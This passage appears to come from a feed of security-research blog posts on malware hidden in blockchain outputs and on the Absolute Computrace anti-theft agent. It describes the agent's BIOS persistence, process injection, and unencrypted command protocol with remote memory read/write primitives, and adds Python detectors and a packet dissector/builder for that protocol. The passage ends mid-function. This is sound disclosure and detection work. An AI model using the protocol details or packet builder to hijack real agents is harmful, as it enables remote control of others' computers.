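            n = int.from_bytes(take(2), "little")
        elif op == OP_PUSHDATA4:                 # next 4 bytes (LE) are the length
            n = int.from_bytes(take(4), "little")
        else:                                    # any other opcode: not a plain data carrier
            return None
        out += take(n)
    return bytes(out)


def classify_payload(payload):
    """Coarse triage of what an output carries; executable headers are what a
    monitor for blockchainware-style abuse would want to surface first."""
    if payload is None:
        return "not a data carrier"
    if payload.startswith(b"MZ"):
        return "PE executable header"
    if payload.startswith(b"\x7fELF"):
        return "ELF executable header"
    if payload and all(32 <= b < 127 or b in (9, 10, 13) for b in payload):
        return "printable text"
    return "opaque binary"


def scan_outputs(scripts):
    """Return (output index, classification, payload length) for each output script."""
    report = []
    for idx, script in enumerate(scripts):
        payload = data_carrier_payload(script)
        report.append((idx, classify_payload(payload), len(payload) if payload else 0))
    return report


# Constructed outputs (not real transactions): a P2PKH script, an OP_RETURN carrying
# text, and an OP_RETURN whose pushed bytes start with a PE header.
P2PKH = bytes.fromhex("76a914" + "11" * 20 + "88ac")
TEXT_CARRIER = bytes([OP_RETURN, 5]) + b"hello"
EXE_CARRIER = bytes([OP_RETURN, OP_PUSHDATA1, 80]) + b"MZ" + bytes(78)
SAMPLE_OUTPUTS = [P2PKH, TEXT_CARRIER, EXE_CARRIER]

if __name__ == "__main__":
    for idx, kind, size in scan_outputs(SAMPLE_OUTPUTS):
        print(f"output {idx}: {kind} ({size} bytes)")
```

Real abuse would more likely spread a payload across many outputs or transactions and obfuscate it, so the header checks are a first-pass filter; the useful metric for the community discussion the post calls for is the aggregate volume and growth of such outputs, which `scan_outputs` gives per transaction.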


To ensure the accurate interpretation of our research, we would like to point out that in the anti-malware industry, there is a clear definition of what constitutes malware, and there are extremely strict policies in place that forbid any attempts to create or distribute malware. The proof-of-concept code we demonstrated was a benign piece of software that opened the Notepad application after getting a confirmation from the user.

So, what exactly did we demonstrate at BlackHat Asia?   See for yourself at:  https://www.youtube.com/watch?v=FNsqXHbeMco

As we pointed out during our presentation, possible solutions can be introduced at different layers. From the perspective of a company developing endpoint security solutions, we don’t believe it’s too much trouble to denylist applications that load unpredictable external payload from a P2P network.


However, from the perspective of the cryptocurrency network, it is still an open question. We are not experts in this field and are therefore not best placed to propose effective solutions. We also don’t want to promote any specific solution, as we believe that the value of solution development (as in the case of Bitcoin) lies in its neutrality and decentralized decision-making.

That’s why we suggest this is a project for the cryptocurrency community.


As a starting point for opening a discussion in the community, we suggest looking for an opportunity to implement a network consensus/negotiation algorithm that will sustain the clean state of the blockchain.

I would like to credit my co-speaker, Christian Karam (@ck4r4m), Cyber Threat Researcher from Interpol, for coming up with the idea for this research and going all the way to the stage at Blackhat and beyond.

Absolute Computrace: Frequently Asked Questions (https://securelist.com/absolute-computrace-frequently-asked-questions/58258/, Thu, 13 Feb 2014 21:15:09 +0000)

In response to numerous requests for comments and clarifications after our presentation at the Kaspersky Security Analyst Summit 2014, we have created this FAQ with some answers to the most commonly asked questions.

1. Why did you decide to expand this research after the presentation about Absolute Computrace in 2009?

Kaspersky Lab decided to undertake full research on this topic after discovering several privately owned laptops of Kaspersky Lab security researchers had the Computrace agent running without prior authorization. Such unauthorized activations quickly became alarming when our reverse engineering revealed serious vulnerabilities in the Computrace agent protocol design.

Absolute Software’s press release from 2009 claims that “The Computrace BIOS module is activated by the installation of Absolute Software by our customers, and is never forced upon any user. Computrace is designed to be activated, deactivated, controlled and managed by the customer using encrypted channels.”

However, we found signs of unauthorized activations on our hardware. Our research paper shows that current versions of the Computrace agent still use unencrypted channels. Because of this, we were able to conduct a live demo of a hijack of the Computrace agent at the SAS 2014 conference.

2. Did you contact Absolute Computrace before making your research public?

We notified Absolute Software via email and attached the full research paper draft. Here is a screenshot of the email message sent to Absolute Software on February 3, 2014:

[Screenshot: the email message sent to Absolute Software on February 3, 2014]

Later that day we received an automatic email from the Absolute Software mail server: “Delivery has failed to these recipients or distribution lists: security@absolute.com”

There were no other error messages, which means that the email should have reached Absolute Software at the other addresses in the list; however, we never received a formal response.

3. How recent was the Computrace agent variant you analyzed?

We analyzed several executables and laptops during the course of this research. The analyzed laptops were brand-new, purchased in 2012 with the top configurations available on the market according to the laptop owners.

The variant of the Computrace agent we used in our live demo was compiled in 2012:

[Screenshot: compile timestamp of the Computrace agent variant used in the live demo (2012)]

4. How can I detect Computrace on a system?

The simplest and most efficient way is to search for the rpcnet.exe process in Task Manager, or for a file with the same name in your C:\Windows\System32 directory. If found, you have Computrace activated. For an extended list of Computrace agent activity, please see Appendix A of our research paper.

5. Should non-Windows users worry about unauthorized activations of Computrace?

As of now, we are not aware of EFI firmware or BIOS Option ROMs that contain executables for non-Windows platforms, which means that the agent code will not be installed on non-Windows partitions. For details on how the agent is installed from BIOS, please see our full research paper.

6. Do the Computrace security issues affect non-Windows platforms?

Our research shows a security flaw in the Computrace agent protocol design which means that theoretically all agents for any platform may be affected. However, we have only confirmed the vulnerability in the Windows agent.

We are aware of Computrace products for Mac OS X and Android tablets. However, we have not analyzed the protocols they use.

Absolute Computrace Revisited (https://securelist.com/absolute-computrace-revisited/58278/, Wed, 12 Feb 2014 21:45:06 +0000)

Abstract

This report is a return to the problem of security mechanisms implemented in modern anti-theft technologies that reside in firmware and PC BIOS of commonly used laptops and some desktop computers. In particular, we have analyzed a number of standalone firmware files and personal computers. While physical security and a lack of proper code validation have already been shown in prior research by Core Labs, in our research we have focused on the network security aspect of such solutions. Our intention was to evaluate how secure Computrace Agent communications are and to see if it is possible to hijack control remotely.

1. Introduction

Modern computer systems, widely used by individual consumers as well as large corporations, come with a number of pre-installed software packages shipped by an OEM manufacturer or a regional reseller to promote certain services and products. It might be difficult for an ordinary user to understand all the risks of such “extra packages” existing on the system. While most of these products can be permanently removed or disabled by the user or an IT administrator, some types of product are designed to remain on the system even after a professional system cleanup or total disk drive replacement. One such type of software is the anti-theft technology widely used on modern laptops, such as Absolute Computrace. While the general idea behind anti-theft technology is good, improper implementation can render it useless as well as harmful, or even extremely dangerous. We believe that companies producing anti-theft technologies must take the security of their products extremely seriously.

Our research started with a real-life incident involving one of our colleagues. He observed repeated system process crashes on one of his personal laptops. The crash generated an event log record and a memory dump that was immediately analyzed. A quick check then led to a full research cycle which eventually resulted in this report.

The failure was related to instability in modules named identprv.dll and wceprv.dll that were loaded in the address space of one of the system service host processes (svchost.exe). A quick analysis of the file information revealed that these modules were created by Absolute Software and are part of the Absolute Computrace software. While Absolute Software is a legitimate company and information about the Computrace product is available on the company’s official website, the owner of the system claimed he had never installed Absolute Computrace and didn’t even know the software was present on his computer. It could be assumed that the software was pre-installed by an OEM manufacturer or reseller company, but according to an Absolute Software whitepaper this should be done by users or their IT service. Unless you have a private IT service or your PC vendor took care of you, someone else has full access to and control over your computer.

This single incident could have been dismissed if it wasn’t for the fact that we discovered more personal computers belonging to our researchers, as well as some enterprise computers, with the same signs of Computrace working on them without authorization. From a minor hindrance the situation quickly turned into a major incident, and we decided to carry out an in-depth analysis.

2. Prior Research

One of the most significant contributions previously made on this subject is authored by Alfredo Ortega and Anibal Sacco of Core Security Technologies. In their whitepaper “Deactivate the Rootkit: Attacks on BIOS anti-theft technologies” they described the general mechanisms behind anti-theft products such as Absolute Computrace.

Prior research has shown a significant risk coming from anti-theft software embedded in BIOS ROMs or firmware. It demonstrated that these modules are vulnerable to local attacks, such as those requiring physical access or the ability to run code on the local system. Alfredo Ortega and Anibal Sacco demonstrated a tool that can be used to change the encrypted registry settings of the Absolute Computrace Agent so that it redirects to another control server.

In addition, we found a blogpost authored by Bradley Susser created in August 2012. The blog mentions a vulnerability in the authentication system of LoJack (Computrace) software. However, the post didn’t have enough proof to back up the claim, so we decided to embark on our own extended analysis.

3. Computrace Agent Normal Operation

Computrace Agent is a Windows application that has two variants: a small agent and a full-size agent. The Small Agent is a piece of code of the smallest possible size and maximum extensibility. This module is embedded into a BIOS PCI Option ROM or UEFI firmware. According to US patent 20060272020 by Absolute Software, where it is called a mini CDA (Communications Driver Agent), it was designed to check whether the full-function agent is installed and functioning on the system and, if not, to load the full-function CDA across the Internet from the server.

According to the patent, the persistence module resides in BIOS Option ROM:

[Figure: BIOS Option ROM]

The Option ROM contents have a small section with Computrace modules that are added by the manufacturer of the BIOS and written to the flash memory by the hardware vendor.

[Figure: PCI Option ROM Absolute module contents]

During our research we downloaded and looked into a few BIOS firmware updates from official vendor support websites. Nowadays an EFI BIOS can contain up to several hundred EFI drivers, applications and other modules packed into a type of file system. One of the modules we found was an EFI Application (or an Option ROM in older systems) with the Absolute Computrace Agent inside. So, if you try to reflash the BIOS with official firmware, you just update the agent to a newer version.

[Figure: rpcnetp.exe inside autochk.exe inside an EFI Application inside another EFI Application inside a ROM module]

We found that some laptops with Computrace in the firmware provide a configuration of the Computrace security feature in BIOS Setup Utility, but in others it is absent.

[Figure: BIOS Setup Computrace settings on a Lenovo ThinkPad X1]

[Figure: Computrace-related settings are not visible in the BIOS Setup of an ASUS X102BA]

It seems that the BIOS Setup Utility developer decides whether to include a feature to enable or disable the Computrace module in BIOS Setup. There are no policies that force them to implement this feature. This creates a serious obstacle for ordinary users who want to disable Computrace.

Stage 1: BIOS module

The first stage (after main BIOS initialization) is to execute modules from the Option ROM. At this point the Computrace code searches for available disk drives and analyzes the partition table. If FAT/FAT32/NTFS partitions are found, it locates the Windows installation path and the autochk.exe application. Next, it creates a backup of parts of the default autochk.exe code and overwrites them with its own code. These parts are saved as an autochk.exe.bak file on FAT, or as the autochk.exe:BAK NTFS alternate data stream (ADS). This can be used as an indicator of Computrace activity at stage one.

On some systems where the Computrace module is not part of the BIOS or it cannot be activated, a different approach is used. On such systems the Computrace activation code modifies the MBR of the hard drive and takes control of the PC at the earliest stage of the system boot. Apparently this approach is not as persistent as a BIOS-based dropper.

Stage 2: autochk.exe

At this stage a modified autochk.exe starts and has full access to the local file system as well as system registry via Windows NT Native API calls. Its main purpose is to drop the local file rpcnetp.exe and change the local system registry to create a new system service called rpcnetp. The original autochk.exe code is then restored.

Stage 3: rpcnetp.exe

This module is also known as the small Computrace Agent or mini CDA (Communication Driver Agent). It is approximately 17 KB in size and is written in C.

It is started as a Windows service; however, its operation is not limited to being a system service. This Windows PE executable copies itself to another file with a .DLL extension, modifies the PE header flags accordingly to change the Windows PE EXE file into a Windows PE DLL, and loads it into memory. After that, rpcnetp.exe creates a child process “svchost.exe” in a suspended state and injects the freshly created rpcnetp.dll into its memory. When the DLL injection is successful and the svchost.exe process is resumed, the latter creates its own child process “iexplore.exe”, started with the environment and rights of the locally logged-in user. The new iexplore.exe is started in a suspended state as well, and it receives an injection of the same rpcnetp.dll.

When iexplore.exe is resumed, it may connect to the Absolute Command & Control (C&C) server to get commands and download additional modules to execute.

[Figure: rpcnetp.exe started two extra processes to initiate a connection with the Absolute C&C server]

This technique is widely used in malicious software and was one of the reasons for our close interest in the modules. In fact, in our experience, no other legitimate software uses techniques like this. The software also uses a time delay of about one minute. We assume that this delay is used to let the system find and connect to a Wi-Fi network after starting, but the same trick is used in many malicious applications to evade malware detection that relies on emulators or sandboxes.

Why are there so many processes to accomplish the simple task of downloading an update? One possible answer is intentional obfuscation of the whole process to protect against reverse engineering. It is more difficult to analyze code that is running as a part of three different processes and has two boot variants: a DLL and an EXE file. It is known that the entry point procedure of EXE and DLL files differ in terms of the number of parameters passed at the start function. While the DLL and EXE variants execute the same code, all potential problems are dealt with quite well, so the code doesn’t crash or cause any instability.

In addition, we have seen certain anti-disassembling and anti-debugging tricks, which required us to perform a more rigorous analysis. After a successful start, rpcnetp.exe removes its registry service entry. This entry will be recreated at the next system start if rpcnetp.exe failed to connect to the C&C server.

We believe the reason it runs in the iexplore.exe process context is to guarantee the availability of the Internet. The svchost.exe process running with Local System rights starts iexplore.exe in the context of the locally logged-in user. Therefore, if the user has Internet access via a proxy server, it will be used automatically when the agent connects to the C&C server. But why keep an extra svchost.exe process? This is apparently because of the limited rights of iexplore.exe. In effect, the svchost.exe process running with Local System privileges simply uses iexplore.exe, with user rights, to pass data to and from the server. This is implemented via a number of CreateRemoteThread, WriteProcessMemory and ReadProcessMemory system API calls. In fact, the rpcnetp.dll module spawns several threads per request to the C&C server. Due to frequent thread creation and termination, the whole system works rather slowly. We recorded and analyzed a communication session between the agent and the C&C server. It is noteworthy that the agent spawned 1355 new threads in svchost.exe and 452 in iexplore.exe to download less than 150 KB of data. The network communication took about four minutes on a high-speed Internet link. During this time the agent issued 596 POST requests.

More details about the Small Agent network protocol can be found later in this report.

Unfortunately, the rpcnetp.exe module has no digital signature inside and no file information data. This makes it not only problematic for a system administrator to decide if it is a legitimate application but also makes it difficult to validate the integrity of the module’s code. We believe this is a serious flaw in current module implementation. In addition, if an attacker sets a read-only attribute for the modified file, it will never be replaced by a legitimate copy of rpcnetp.exe from BIOS.

Rpcnetp.exe has a rather interesting timestamp inside. When you collect the link or export table timestamps from several different samples, it becomes obvious that they were altered by someone (note the repeating double-byte values in hex form). Below are some of these timestamp values in hexadecimal form:

4aa04aa0
4aa44aa4
4aa54aa5
4aa64aa6
...
4f4c4f4c
4f504f50
4f954f95
4fc64fc6

This data is not used by the sample we analyzed and it’s unclear what kind of information it carries, but considering rpcnetp.exe has no file information data, it could be a marker with the agent version.

Ultimately, the main purpose of rpcnetp.exe is to download and start a fully functional remote access tool. It communicates with a C&C server, relying on the built-in capabilities of the Small Agent to obtain some extra executables. The first executable sent to the agent is the file wceprv.dll, which is used to provide data encryption. Soon after saving wceprv.dll in the System32 directory, the Small Agent loads it into memory and switches its conversation with the C&C to a more secure encrypted form. After that the Small Agent downloads extra files such as identprv.dll, Upgrd.exe and NTAgent.exe (later renamed to rpcnet.exe). It then starts Upgrd.exe, a single-run tool that handles the upgrade procedure: stopping and removing the current rpcnetp service, and registering and starting a new service for rpcnet.exe (“Remote Procedure Call (RPC) Net”).

Stage 4: rpcnet.exe

When the rpcnet service starts successfully, it attempts to connect to the C&C server right away. The procedure is very similar to the rpcnetp service: it spawns a child svchost.exe, which creates iexplore.exe under the local user account. Like rpcnetp, it creates many threads in these processes during communication with the C&C server. This service looks for its configuration in several places on the system: a registry key, reserved space on the hard drive and its own body. The configuration states which server the agent should connect to. Surprisingly, it connects back to the same server and port as the previous rpcnetp service. We have not analyzed this service completely yet, but it is absolutely clear that its main purpose is to provide extensible remote access to the machine running it.
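The four stages above leave a consistent set of artefacts, and the FAQ's detection advice (look for rpcnet.exe as a process or in System32) is the last of them. As an added example, not Absolute Software's or Kaspersky Lab's code, the Python below checks a snapshot of a host against the indicators named in this report: the autochk.exe backup from stage 1, the small-agent and downloaded modules from stage 3, the rpcnetp and rpcnet services, the agent processes, and the svchost.exe-to-iexplore.exe parent/child relationship the injection chain produces. The artefact paths are assumed to be under C:\Windows\System32 as the text says, the stage descriptions are mine, and the sample snapshot is constructed, not real telemetry.

```python
# Added example (not Absolute Software's or Kaspersky Lab's code): check a host
# snapshot for the Computrace artefacts named in stages 1-4 and in the FAQ.
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name")

# File artefacts per stage (lower-case Windows paths, as given in the report).
FILE_INDICATORS = {
    r"c:\windows\system32\autochk.exe.bak": "stage 1: backup of patched autochk.exe (FAT)",
    r"c:\windows\system32\autochk.exe:bak": "stage 1: backup of patched autochk.exe (NTFS ADS)",
    r"c:\windows\system32\rpcnetp.exe": "stage 3: small agent (mini CDA)",
    r"c:\windows\system32\rpcnetp.dll": "stage 3: DLL copy used for injection",
    r"c:\windows\system32\wceprv.dll": "stage 3: downloaded encryption module",
    r"c:\windows\system32\identprv.dll": "stage 3: downloaded module",
    r"c:\windows\system32\upgrd.exe": "stage 3: single-run upgrade tool",
    r"c:\windows\system32\rpcnet.exe": "stage 4: full agent",
}
SERVICE_INDICATORS = {
    "rpcnetp": "stage 3 service",
    "rpcnet": "stage 4 service (Remote Procedure Call (RPC) Net)",
}
PROCESS_INDICATORS = {"rpcnetp.exe", "rpcnet.exe"}


def matching_files(paths):
    """Return (path, description) for every known artefact present in the listing."""
    return [(p, FILE_INDICATORS[p.lower()]) for p in paths if p.lower() in FILE_INDICATORS]


def matching_services(names):
    """Return (service name, description) for the agent services, if registered."""
    return [(n, SERVICE_INDICATORS[n.lower()]) for n in names if n.lower() in SERVICE_INDICATORS]


def matching_processes(procs):
    """Return the Proc entries whose image name is one of the agent executables."""
    return [p for p in procs if p.name.lower() in PROCESS_INDICATORS]


def iexplore_under_svchost(procs):
    """The injection chain ends with iexplore.exe whose parent is svchost.exe, a pair a
    browser launched by the user (parent explorer.exe) does not have. Return (child, parent) pids."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if p.name.lower() == "iexplore.exe" and parent and parent.name.lower() == "svchost.exe":
            hits.append((p.pid, parent.pid))
    return hits


def assess(paths, services, procs):
    """Run every check and return one report; empty lists mean nothing was found."""
    return {
        "files": matching_files(paths),
        "services": matching_services(services),
        "processes": matching_processes(procs),
        "injection_chain": iexplore_under_svchost(procs),
    }


# Constructed snapshot of an affected system (not real telemetry): file listing,
# registered service names and a process table with (pid, ppid, name).
SAMPLE_PATHS = [
    r"C:\Windows\System32\autochk.exe",
    r"C:\Windows\System32\autochk.exe:BAK",
    r"C:\Windows\System32\rpcnetp.exe",
    r"C:\Windows\System32\wceprv.dll",
    r"C:\Windows\System32\rpcnet.exe",
]
SAMPLE_SERVICES = ["Dhcp", "rpcnet"]
SAMPLE_PROCS = [
    Proc(4, 0, "System"),
    Proc(700, 600, "svchost.exe"),        # ordinary service host
    Proc(1100, 800, "rpcnet.exe"),        # stage 4 agent service
    Proc(1200, 1100, "svchost.exe"),      # child spawned by the agent
    Proc(1300, 1200, "iexplore.exe"),     # injected browser under svchost.exe
    Proc(2000, 1500, "explorer.exe"),
    Proc(2100, 2000, "iexplore.exe"),     # browser started by the user: not flagged
]

if __name__ == "__main__":
    for key, hits in assess(SAMPLE_PATHS, SAMPLE_SERVICES, SAMPLE_PROCS).items():
        print(f"{key}: {hits}")
```

On a live Windows host the three inputs can be gathered with a directory listing of System32 (including alternate data streams), the service control manager's service list and a process table that includes parent PIDs; the checks above are deliberately input-agnostic so they also run over collected forensic data.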

4. Cases of Unauthorized Activations

We think having anti-theft technology is a good idea, but only if everything works the way it is supposed to. When something goes wrong, a technology that has been developed to protect might be used as a weapon to attack. We have no proof of Absolute Computrace being used as a platform for attacks, but we see the potential for this and some alarming and inexplicable facts make this increasingly likely.

One of the reasons for such in-depth research was the discovery of an unauthorized activation of a Computrace module in BIOS. We have observed several systems that seem to be affected by this mysterious problem.

The first natural reaction of PC owners was to remove or disable this feature as soon as possible. One user decided to completely stop using Windows on his PC due to Absolute Computrace functions. That created certain difficulties for us in post-mortem analysis, but we managed to collect enough information to find the key timestamps of Computrace Agent activity.

System A

The owner of the system claims that he never installed, activated or even saw any Absolute products. However, the system was obviously running the Computrace Agent software.

[Image: PC belonging to a Kaspersky Lab employee with Computrace Agent]

According to the user, the laptop was purchased on April 27, 2012. The laptop owner stated that he was present when the packaging was opened at the point of sale and the seal had not been broken. Later that day he switched on the laptop and booted up the system. The creation of the C:\Users directory on the hard drive indicated the exact time (local time zone) of the first start: 20:31, April 27, 2012.

Next, the owner configured access to the Internet, which automatically generated Wireless LAN profile configuration files at C:\ProgramData\Microsoft\Wlansvc\Profiles, which has the following creation time: 20:52, April 27, 2012.

Soon after that the Computrace rpcnetp.exe module woke up and attempted to communicate with a C&C server. We found that it downloaded an update which was saved in C:\Windows\SysWOW64\rpcnet.dll at 21:29, April 27, 2012.

This proves that the owner of the laptop purchased it with the Computrace Agent pre-activated or activated automatically during the initial system installation.

Laptop Model: ASUS 1225B

System B

This system had obvious signs of Computrace Agent activity while the owner of the system stated that he has never installed or used any Absolute Software products.

[Image: Another private PC belonging to one of our colleagues]

According to information from the file system, the C:\Users directory was created on 2012-08-11 15:23:45 (local time zone). The owner recognized that as the date of purchase.

Then we found some more files:

C:\Windows\SysWOW64\wceprv.dll - 2012-08-11 19:39:41
C:\Windows\SysWOW64\rpcnet.exe - 2012-08-11 19:42:29
C:\Windows\SysWOW64\Upgrd.exe - 2012-08-11 19:42:44
C:\Windows\SysWOW64\rpcnet.dll - 2012-08-11 19:43:07

All of this confirms that the Computrace Agent was installed on the day the laptop was purchased. The owner claimed that he broke the factory seal and started the OS in the store and later that day connected the laptop to his home Wi-Fi network. As in the case of System A, this means that the agent was pre-activated on System B.

Laptop Model: Samsung 900X3C

System C

During our research we made several attempts to find pre-activated Computrace in a number of local computer retail shops. In total we have manually checked more than 150 different configurations from various manufacturers. To our surprise, we have found just a single system that had rpcnet.exe running.

[Image: Backdoored PC at a local retail shop]

We didn’t have the chance to fully analyze the system in the shop, but the fact that rpcnet.exe was running meant that rpcnetp.exe was started and had successfully downloaded the rpcnet.exe from the Internet. The laptop was on sale and when we asked why, a shop assistant explained that it had been returned by the first owner because of a broken keyboard. The keyboard was repaired after that and the laptop was put on sale at a discount. That means the laptop was used and probably connected to the Internet by the temporary owner or at the repair service. It’s unclear whether Computrace was activated by the user or by repair service staff, so we decided not to rely on this finding.

Laptop Model: Samsung NP670Z5E

We have contacted the Absolute Computrace technical support service and provided the serial numbers of hardware that had suspicious installations of Computrace Agents. The technical support assistant reported that those serial numbers were not in their database. We believe this means Computrace was not activated in the normal way. How it was activated, why and by whom remains a mystery.

Online Forum Reports

Besides that, we have found several online messages by users claiming that Computrace is activated on their computers. Below are some examples of such claims found on online message boards:

[Image: One user claims he has never used Absolute Software products but it is running on his machine]

[Image: Another user online claims he has a brand new laptop with preactivated Computrace]

[Image: Yet another user claims he never ordered Computrace, but it was running]

These and other claims of laptop owners suggest that unauthorized activations of Computrace products are possibly quite widespread.

5. Scale of Potential Problem

Using Kaspersky Security Network we have collected statistics on the number of computers where Absolute Computrace is activated.  Below is a map showing the geographical distribution of computers that have Computrace Agent running:

[Image: Map of the geographical distribution of computers that have Computrace Agent running]

Our stats are limited to anonymous data from Kaspersky Lab products that have KSN enabled, which is a very small subset of all users online. According to our estimates, the real number of users with Computrace Agent activated on their computers may exceed 2 million. We have no information on how many of those users know that Computrace Agent is running on their systems.

In addition, we have collected statistics about the baseboard manufacturer names on computers where Computrace Agent is active.

[Image: Baseboard manufacturers of systems where Computrace Agent is active]

We have compared this chart to the chart of most popular PC Vendor manufacturers (according to Gartner for Q4 2013 Shipments).

[Image: Most popular PC vendors according to Gartner]

You can see that, with the exception of Toshiba, the TOP5 PC market players are in the TOP6 of PCs where Computrace is active. According to Wikipedia, “On some Toshiba laptops rpcnetp.exe is preinstalled by Toshiba on the unit’s hard drive prior to shipment from the factory“. This explains why there are so many Toshiba computers with Computrace. However, it’s not so clear why the top two vendors, Lenovo and HP, have a relatively low number of Computrace Agents on their PCs, while ACER and ASUS, lower down the ranking, have a more significant share of affected computers. We have found no public information about ASUS or ACER policies regarding Computrace activation or pre-installation on hard drives.

6. Computrace Agent Network Protocol

Soon after startup, rpcnetp.exe (the Small Agent) attempts to establish a TCP connection with the C&C server. It may connect via an IP address hard-coded in its body, set in the registry or stored on a hidden location on the hard disk. If direct communication by IP fails, it may try to resolve a domain name (typically search.namequery.com) and use a new IP instead.

Small Agent was expected to download and run additional executables. However, we haven’t found any specific functionality that was designed for downloading and running additional modules. Nevertheless, the extensibility of its protocol allows it to do absolutely anything including downloading and running extra modules. The US20060272020 patent has an interesting paragraph regarding the rpcnetp.exe communication protocol:

Deploying the Persistence Agent successfully in BIOS, for example, makes heavy use of an extensibility designed into the communications protocol. Without this extensibility the Agent would be larger and require frequent updates to add or change functionality. Such updates are neither practical nor economical, since the BIOS is programmed into the flash EEPROM of the platform and special tools (most often requiring user interaction) must be used to update the BIOS. Also, intensive testing is performed by the OEM on the BIOS since its integrity is critical to the operation of the computer.

Having read that, it becomes clear that we should not expect to find any classic implementation of an update mechanism. According to the patent, the Small Agent supports “A method to read and write the Agent’s memory space”. Basically, this is the core mechanism of running arbitrary code on the remote computer, sufficient to accomplish a download task.

Here is how communication between the Small Agent and a C&C server looks in the Wireshark network sniffer:

[Image: Part of network communication between Small Agent and C&C server]

The whole communication consists of a series of POST requests and HTTP responses. The first request sent by the Small Agent has no payload; it’s an empty POST request. The server replies with a special HTTP header, Tag Id, that will be used until the end of the conversation with the agent. Each HTTP response and subsequent POST request includes short binary data which forms a packet to process. HTTP is used in a very simple mode, just as a carrier of the agent packets. The binary packets are crafted using Computrace’s basic communication protocol. While we see that the agent initiates an HTTP session and sends the first HTTP request to the server, the direction of the real communication is the opposite: the server responses are treated as requests to the client, and the client responds to these requests in the data added to the following HTTP POST request.

You can find the structure of such packets below:

[Image: Structure of the Small Agent packets]

All packets start and end with a special byte “~” (0x7E). This byte is used as a packet border indicator (packet separator). The following 4-byte field contains an Address of memory to work with. If the packet is of read-type, then the Small Agent will read memory starting from this address. The number of bytes to read is specified in the following Size field (2 bytes long). Each packet is appended with 3 special bytes: 1 byte for Seq and 2 bytes for Cksum. Seq is a special 8-bit value used as a sequence number that is incremented by server and client according to their sequence algorithm. Cksum is a 2-byte value holding a short custom hash of all the fields after the packet separator and before the Cksum. If the Seq or Cksum values are not what the Small Agent expects, then the current request is discarded and the last response is used instead. A Seq number corresponding to the last response should indicate to the C&C server that the agent has received a corrupted or altered packet and the server should retransmit the request.

The first packet of the server is special and is used for a basic handshake with the client. It looks like this:

[Image: Handshake Packet layout]

The Address field is set to hexadecimal 0xFFFFFFFF, Size is set to 0x0004 and a unique Session ID is chosen by the server. The value of the Session ID should be used by the client in all responses to the server. The client response has a fixed format:

[Image: Client response packet layout]

As with the server packets, the response packet must always start and end with a packet separator. The first 4 bytes after that are set to the fixed Session ID value defined by the server in the Handshake Packet. The next 2-byte field is the size of the Response Data which follows it. After that, the Seq and Cksum fields are used as in the server packets.

An additional byte modification rule (escaping) is applied if any of the fields between the packet separators contain a byte with hex-code 0x7E (which matches the packet separator). In this case the 0x7E byte is transformed into a sequence of two bytes, 0x7D 0x5E, which increases the packet size and would affect the checksum. However, interpretation of the packet and calculation of the checksum are only performed after unescaping the packet. If a 0x7D byte is present in the packet before escaping, it must also be escaped: 0x7D is replaced with the sequence 0x7D 0x5D.

This completes the protocol according to what we have observed. The protocol provides two basic primitives:

  1. Read operation
  2. Write operation
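The framing, escaping and checksum-check rules above are enough to write a dissector for the Small Agent packets that an analyst can run over captured POST bodies. The following is an added example written for this article, not Absolute's code or the Computrace protocol implementation. It assumes little-endian multi-byte fields, that a write request carries Size bytes of data after the Size field while a read request carries none, and that the handshake is a write of the 4-byte Session ID to address 0xFFFFFFFF. Computrace's custom 16-bit hash is not public, so `placeholder_cksum` (a plain 16-bit sum) stands in for it and the real routine can be passed in via `cksum_fn`; the sample frames are constructed in the code.

```python
"""Dissector for the Small Agent packet framing (added example, not Absolute's code).

ASSUMPTIONS: little-endian fields; write = Size bytes of data follow Size,
read = no data; handshake = write of the 4-byte Session ID to 0xFFFFFFFF;
placeholder_cksum is NOT the real Computrace hash, only a stand-in.
"""
import struct
from dataclasses import dataclass
from typing import Callable, Tuple

SEP = 0x7E               # '~', packet border byte
ESC = 0x7D               # escape prefix used inside the body
HANDSHAKE_ADDR = 0xFFFFFFFF
Hash16 = Callable[[bytes], int]


def placeholder_cksum(data: bytes) -> int:
    """Stand-in for the undocumented custom 16-bit hash (ASSUMPTION)."""
    return sum(data) & 0xFFFF


def escape(raw: bytes) -> bytes:
    """Byte-stuff the body: 0x7E -> 7D 5E, 0x7D -> 7D 5D (done after checksumming)."""
    out = bytearray()
    for b in raw:
        if b in (SEP, ESC):
            out += bytes((ESC, b ^ 0x20))
        else:
            out.append(b)
    return bytes(out)


def unescape(stuffed: bytes) -> bytes:
    """Reverse of escape(); rejects a bare separator or a malformed escape pair."""
    out, it = bytearray(), iter(stuffed)
    for b in it:
        if b == SEP:
            raise ValueError("bare separator inside packet body")
        if b == ESC:
            nxt = next(it, None)
            if nxt not in (0x5E, 0x5D):
                raise ValueError("malformed escape sequence")
            out.append(nxt ^ 0x20)
        else:
            out.append(b)
    return bytes(out)


def _frame(body: bytes, cksum_fn: Hash16) -> bytes:
    """Append Cksum over everything before it, then escape and wrap in separators."""
    body += struct.pack("<H", cksum_fn(body))
    return bytes([SEP]) + escape(body) + bytes([SEP])


def _unframe(frame: bytes, cksum_fn: Hash16) -> bytes:
    """Strip separators, unescape and verify Cksum; returns the body without Cksum."""
    if len(frame) < 2 or frame[0] != SEP or frame[-1] != SEP:
        raise ValueError("missing packet separators")
    body = unescape(frame[1:-1])
    if len(body) < 9:  # 4 (addr/session) + 2 (size) + 1 (seq) + 2 (cksum)
        raise ValueError("truncated packet")
    expected = struct.unpack_from("<H", body, len(body) - 2)[0]
    if cksum_fn(body[:-2]) != expected:
        raise ValueError("checksum mismatch: the agent would discard this request")
    return body[:-2]


@dataclass
class ServerPacket:
    address: int
    size: int
    data: bytes   # empty for a read request, Size bytes for a write request
    seq: int

    @property
    def is_handshake(self) -> bool:
        return self.address == HANDSHAKE_ADDR and self.size == 4 and len(self.data) == 4

    @property
    def session_id(self) -> int:
        if not self.is_handshake:
            raise ValueError("not a handshake packet")
        return struct.unpack("<I", self.data)[0]


def build_server_packet(address: int, size: int, data: bytes = b"", seq: int = 0,
                        cksum_fn: Hash16 = placeholder_cksum) -> bytes:
    """Builds a read (no data) or write (len(data) == size) request frame for testing."""
    if data and len(data) != size:
        raise ValueError("write data must be exactly Size bytes")
    return _frame(struct.pack("<IH", address, size) + data + bytes([seq & 0xFF]), cksum_fn)


def parse_server_packet(frame: bytes, cksum_fn: Hash16 = placeholder_cksum) -> ServerPacket:
    body = _unframe(frame, cksum_fn)
    address, size = struct.unpack_from("<IH", body, 0)
    data, seq = body[6:-1], body[-1]
    if data and len(data) != size:
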